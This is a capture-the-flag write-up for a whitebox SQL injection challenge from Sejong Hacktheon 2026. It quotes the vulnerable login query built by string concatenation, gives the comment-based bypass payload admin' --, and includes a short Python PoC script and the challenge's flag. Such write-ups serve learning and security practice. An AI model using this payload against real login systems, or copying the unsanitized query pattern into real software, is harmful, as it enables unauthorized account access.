Skip to content
· 2 min read

Simple-sqli

CTF Write-up

Quick Nav
Sejong Hacktheon 2026 Hidden

Challenge Information

  • Category: Web Exploitation
  • Event: Sejong Hacktheon 2026
  • Author: Hidden
  • Difficulty: Hidden

1. Initial Analysis

This is a Web challenge featuring a standard login form interface:

Since it is a whitebox challenge, I analyzed the source code directly. The challenge name “Simple-sqli” strongly suggests a SQL Injection vulnerability, so I focused my investigation on the database query logic.

The objective is to retrieve the FLAG located in the secret column of the admin user within the users table.

Check the app.py file, a critical vulnerability was identified in lines 44-47:

        query = (
            "SELECT username, role, secret FROM users "
            f"WHERE username = '{username}' AND password = '{password}'"
        )

The username and password inputs are directly concatenated into the SQL query string using strings without any sanitization or filtering. This leads to 99% SQL Injection.

2. Exploitation

The simple exploitation method is an Authentication Bypass by commenting out the password verification clause:

username = admin' --
password = <ANYTHING_STRING>

When the payload is injected, the final SQL query executed by the database becomes:

SELECT username, role, secret FROM users WHERE username = 'admin' --' AND password = '<ANYTHING_STRING>'
  • The single quote (') after admin closes the username string literal.
  • The double dash (--) acts as a comment indicator in SQL, causing the database to ignore the rest of the query (bypass password check).

3. Result

  • Payload used
	username = admin' --
	password = BKSEC

  • Flag: hacktheon2026{d0nt_f0rget_the_s1ng1e_qu0te}
  • PoC:
import requests  
  
# Configuration  
TARGET_URL = "URL"  
  
  
def get_flag():  
    session = requests.Session()  
  
    # SQL Injection payload to bypass authentication  
    payload = {  
        "username": "admin'--",  
        "password": "BKSEC"  
    }  
  
    # Send the malicious login request  
    response = session.post(f"{TARGET_URL}/", data=payload)  
  
    # Check if we were redirected to the flag page  
    if "/flag" in response.url or "admin" in response.text:  
        print("[+] Login successful as admin!")  
        # Access the flag page specifically if needed  
        flag_page = session.get(f"{TARGET_URL}/flag")  
        print("[+] Flag:")  
        print(flag_page.text)  
    else:  
        print("[-] Exploit failed.")  
  
  
if __name__ == "__main__":  
    get_flag()

$ ls ./related/